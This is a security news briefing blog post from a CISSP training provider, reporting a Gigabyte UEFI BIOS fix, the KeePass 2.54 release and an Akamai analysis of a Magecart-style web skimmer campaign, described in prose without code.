Blog entry by Les Bell

Les Bell
Security News: 2023-06-06
by Les Bell - Tuesday, June 6, 2023, 7:15 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Gigabyte UEFI BIOS Fix Release

Last Friday, we brought you news of a vulnerability in the UEFI BIOS of Gigabyte motherboards which could allow attackers to inject a UEFI bootloader via a MitM attack. The good news is that Gigabyte has now released an updated BIOS which has implemented stricter security checks during the boot process, specifically:

  • Signature verification - files downloaded from remote servers are now validated by checking their signatures, and
  • Privilege Access Limitations - stronger verification of remote server certificates

Security-conscious users might wish that Gigabyte had removed this automatic downloading feature completely - but then, not everyone is as conscientious about patching their systems, so that an automatic process is perhaps necessary in some environments.

Uncredited, Gigabyte Fortifies System Security with Latest BIOS Updates and Enhanced Verification, press release, 1 June 2023. Available online at https://www.gigabyte.com/Press/News/2091.

KeePass Vulnerability Fixed

Another good news story: the keepers of the KeePass project - a password safe program favoured by a number of security pros in our circle - have released KeePass version 2.54, which fixes an in-memory master password exposure problem we reported on back in mid-May.

The new release also features some user interface and integration enhancements. There are some issues that previous users may need to pay attention to, involving triggers, global URL overrides and password generator profiles, which are now saved to the enforced configuration file - users who had not previously saved these to that file will find that they have been disabled until reconfigure their individual settings

Uncredited, KeePass 2.54 released, news release, 3 June 2023. Available online at https://keepass.info/news/n230603_2.54.html.

Merchant Servers Abused by Skimmer Campaign

Researchers at Akamai have discovered and analysed a new Magecart-style web skimmer campaign which steals PII and credit card information from a variety of e-commerce web sites running the popular Magento, WooCommerce WordPress and Shopify platforms across North America, Latin America and Europe. Some of the sites are estimated to handle hundreds of thousands of visitors per month, and these customers' information and credit card details could end up on the dark web.

The attack involves two sets of servers:

  • host victims - legitimate web sites which are hijacked in order to host the malicious JavaScript code which will be delivered to the victims; being legitimate businesses, these sites are less likely to arouse suspicion. Some of the host victims are themselves e-commerce sites which were compromised by the skimmer attack and then abused a second time to spread the attack malware.
  • web skimming victims - the vulnerable merchant servers which are targeted by the skimming attack. Rather than injecting the attack code directly into these sites, the attackers employ small JavaScript snippets to fetch their malware from the host victim sites, thereby concealing the malicious activity.

The injected snippets are intentionally designed to resemble popular third-party campaign tracking services such as Google Tag Manager and Facebook Pixel, and the URL's of the host vicim web sites are further obfuscated by encoding them with base64 encoding.

The Akamai report suggests various mitigations, such as implementing a web application firewall.

Lvovsky, Roman, New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others, blog post, 1 June 2023. Available online at https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
Permalink